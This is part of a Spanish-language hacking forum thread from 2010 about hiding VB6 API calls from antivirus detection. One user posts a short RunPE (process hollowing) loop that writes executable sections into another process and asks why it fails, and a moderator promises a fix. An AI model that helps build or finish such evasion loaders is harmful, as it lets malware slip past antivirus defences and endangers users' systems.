elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 19:22  


Tema destacado: Suscripción al boletín mensual de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  [TLB][VB6] Indetectar DllFunctionCall y CopyBytes
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes  (Leído 4,923 veces)
common26

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes
« Respuesta #15 en: 20 Junio 2010, 20:06 »

Alhuien a logrado hacer funcionar Runpe con TLB = copybytes???

Esta es la parte peluda:

For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1

            Copybytes tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)

            Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0

Next i

Use mezcla de copybtes y copymem y nada :(

Ayuda!!!!
En línea
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.190


Se siente observado ¬¬'


Ver Perfil
Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes
« Respuesta #16 en: 20 Junio 2010, 21:43 »

Hay un problema con VB6... por lo visto no funciona correctamente con estructuras y APIs definidas en TLB, a ver si durante esta semana saco tiempo y pongo la solucion, simplemente seria sacar el puntero correctamente usando alguna API :P

Saludos :D
En línea

common26

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes
« Respuesta #17 en: 22 Junio 2010, 20:06 »

Hay un problema con VB6... por lo visto no funciona correctamente con estructuras y APIs definidas en TLB, a ver si durante esta semana saco tiempo y pongo la solucion, simplemente seria sacar el puntero correctamente usando alguna API :P

Saludos :D

Ojala puedas... ando encuero con ese API jodiendo :D

Gracias de antemano!!!

<cmm>
En línea
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Ayuda] Stub.dll Indetectar
Dudas Generales
NyxKazuya 3 2,359 Último mensaje 2 Marzo 2011, 06:26
por pitoloko
Indetectar archivo .jar?
Java
Sapote 0 597 Último mensaje 8 Abril 2011, 08:28
por Sapote
como Indetectar .exe?
Análisis y Diseño de Malware
sircam666 6 2,011 Último mensaje 5 Septiembre 2011, 04:51
por bitorkos
Duda indetectar troyano
Dudas Generales
irivator 1 1,227 Último mensaje 15 Agosto 2011, 22:38
por WHK
Indetectar .jar
Java
lucasluks1004 2 1,105 Último mensaje 8 Septiembre 2011, 00:00
por lucasluks1004
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines